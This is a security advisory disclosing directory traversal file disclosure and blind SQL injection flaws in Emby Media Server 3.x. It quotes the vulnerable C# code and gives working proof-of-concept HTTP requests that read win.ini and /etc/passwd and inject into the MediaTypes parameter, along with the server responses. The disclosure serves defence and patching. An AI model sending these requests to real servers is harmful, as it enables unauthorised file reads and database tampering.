Vulnerabilities Summary
The following advisory describes three (3) vulnerabilities found in Emby Media Server.
Affected versions are: 3.1.5, 3.1.2, 3.1.1, 3.1.0 and 3.0.0.
Emby Media Server (formerly Media Browser) is a media server designed to organize, play, and stream audio and video to a variety of devices. Emby is open-source, and uses a client server model. Two comparable media servers are Plex and Windows Media Center.
The vulnerabilities found in Emby Media Server are:
- Directory Traversal
- File Disclosure
- SQL Injection
Credit
An independent security researcher Gjoko Krstic from Zero Science Lab has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor Response
Emby has been notified in March 2017 about the vulnerability, shortly after they have released a new version that addresses this vulnerabilities. They however have not provided any version information or release notes that reflect this.
Vulnerabilities Details
Directory Traversal File Disclosure
Emby Media Server is suffer from Directory Traversal File Disclosure vulnerability. Input passed via the ‘swagger-ui‘ object in SwaggerService.cs is not properly verified before being used to load resources. This can be exploited to disclose the contents of arbitrary files via directory traversal attacks.
Version 3.1.0 is affecting Linux, Windows and Mac platforms.
Version 3.1.5 only affects Windows release.
Vulnerable Code
Vulnerable file path: /Emby.Server.Implementations/HttpServer/SwaggerService.cs
using MediaBrowser.Controller;
using MediaBrowser.Controller.Net;
using System.IO;
using MediaBrowser.Model.IO;
using MediaBrowser.Model.Services;
namespace Emby.Server.Implementations.HttpServer
{
public class SwaggerService : IService, IRequiresRequest
{
private readonly IServerApplicationPaths _appPaths;
private readonly IFileSystem _fileSystem;
public SwaggerService(IServerApplicationPaths appPaths, IFileSystem fileSystem, IHttpResultFactory resultFactory)
{
_appPaths = appPaths;
_fileSystem = fileSystem;
_resultFactory = resultFactory;
}
/// <summary>
/// Gets the specified request.
/// </summary>
/// <param name="request">The request.</param>
/// <returns>System.Object.</returns>
public object Get(GetSwaggerResource request)
{
var swaggerDirectory = Path.Combine(_appPaths.ApplicationResourcesPath, "swagger-ui");
var requestedFile = Path.Combine(swaggerDirectory, request.ResourceName.Replace('/', _fileSystem.DirectorySeparatorChar));
return _resultFactory.GetStaticFileResult(Request, requestedFile).Result;
}
/// <summary>
/// Gets or sets the result factory.
/// </summary>
/// <value>The result factory.</value>
private readonly IHttpResultFactory _resultFactory;
/// <summary>
/// Gets or sets the request context.
/// </summary>
/// <value>The request context.</value>
public IRequest Request { get; set; }
}
}
Proof of Concept
An attacker sends the following request (when Emby runs on a Windows machine):
GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
The server responds with:
HTTP/1.1 200 OK X-UA-Compatible: IE=Edge Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS Access-Control-Allow-Origin: * Vary: Accept-Encoding ETag: "07bec80f76d20d26dd300a855219d321" Cache-Control: public Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50 Content-Type: application/octet-stream Date: Thu, 22 Dec 2016 10:43:53 GMT Content-Length: 403 Connection: close ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 [MCI Extensions.BAK] 3g2=MPEGVideo 3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo
When Emby runs on a Linux machine a similar request:
http://127.0.0.1/%2femby%2fswagger-ui%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
Would yield this server response:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync ... ...
SQL Injection
Emby suffers from a blind SQL injection vulnerability. Input passed via the GET parameter ‘MediaTypes’ is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code without authentication.
Proof of Concept
An attacker sends the following request:
GET /emby/Users/abb355429db54e159ac2a7a3cbd6eb12/Items?ParentId=4cd160cad6c50f34ca42be0136af2316&Filters=IsNotFolder&Recursive=true&SortBy=SortName&MediaTypes=Audio%2cVideo'&Limit=100&Fields=MediaSources%2CChapters&ExcludeLocationTypes=Virtual HTTP/1.1 Host: 10.211.55.3:8096 accept: application/json x-mediabrowser-token: ba5a68dfa1134bd6af642228bbf757bb User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome 55.0.2883.87", DeviceId="104a154d5aa8c9576a2508113b47a53b6170253c", Version="3.1.0.0", UserId="abb355429db54e159ac2a7a3cbd6eb12" Accept-Encoding: gzip, deflate, sdch Accept-Language: en-US,en;q=0.8 Connection: close
Server response:
HTTP/1.1 500 Internal Server Error Content-Type: text/html Server: Mono-HTTPAPI/1.0 Date: Tue, 21 Feb 2017 12:06:09 GMT Content-Length: 64 Connection: close Exception of type 'SQLitePCL.pretty.SQLiteException' was thrown.
